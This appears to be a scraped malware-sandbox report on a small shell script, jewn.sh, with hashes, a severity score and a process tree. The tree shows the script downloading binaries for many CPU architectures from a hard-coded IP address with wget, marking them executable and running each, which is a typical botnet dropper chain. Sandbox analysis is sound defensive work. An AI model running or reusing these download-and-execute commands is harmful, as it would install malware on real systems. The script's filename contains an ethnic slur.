fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645

Analysis

max time kernel
0s
max time network
102s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08-02-2023 06:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jewn.sh
Size

1KB
MD5

2097bb27333c25ce9708e90de1604d99
SHA1

5e26a804a9ee8922e12e8eb3aab85cdd83235ebb
SHA256

fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645
SHA512

7417d2e7a5c2266038244ccf0c9efcc6007766e10221f8fc65f74bc5559e060d0d0ee771cd8eaaf9db5269d4cf1af84bc07f65dff60a89d64565a721dd64eb53

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/jewn.sh	/tmp/jewn.sh	jewn.sh

/tmp/jewn.sh
/tmp/jewn.sh
1⤵
- Writes file to tmp directory
PID:571
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.x86
  2⤵
  PID:572
- /bin/cat
  cat jew.x86
  2⤵
  PID:578
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:579
- ./jewn
  ./jewn
  2⤵
  PID:580
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mips
  2⤵
  PID:582
- /bin/cat
  cat jew.mips
  2⤵
  PID:584
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:585
- ./jewn
  ./jewn
  2⤵
  PID:586
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mpsl
  2⤵
  PID:588
- /bin/cat
  cat jew.mpsl
  2⤵
  PID:590
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:591
- ./jewn
  ./jewn
  2⤵
  PID:592
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm4
  2⤵
  PID:594
- /bin/cat
  cat jew.arm4
  2⤵
  PID:596
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:597
- ./jewn
  ./jewn
  2⤵
  PID:598
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm5
  2⤵
  PID:600
- /bin/cat
  cat jew.arm5
  2⤵
  PID:602
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:603
- ./jewn
  ./jewn
  2⤵
  PID:604
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm6
  2⤵
  PID:606
- /bin/cat
  cat jew.arm6
  2⤵
  PID:608
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:609
- ./jewn
  ./jewn
  2⤵
  PID:610
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm7
  2⤵
  PID:612
- /bin/cat
  cat jew.arm7
  2⤵
  PID:614
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:615
- ./jewn
  ./jewn
  2⤵
  PID:616
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.ppc
  2⤵
  PID:618
- /bin/cat
  cat jew.ppc
  2⤵
  PID:620
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:621
- ./jewn
  ./jewn
  2⤵
  PID:622
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.m68k
  2⤵
  PID:624
- /bin/cat
  cat jew.m68k
  2⤵
  PID:626
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:627
- ./jewn
  ./jewn
  2⤵
  PID:628
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.sh4
  2⤵
  PID:630
- /bin/cat
  cat jew.sh4
  2⤵
  PID:632
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
  2⤵
  PID:633
- ./jewn
  ./jewn
  2⤵
  PID:634

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads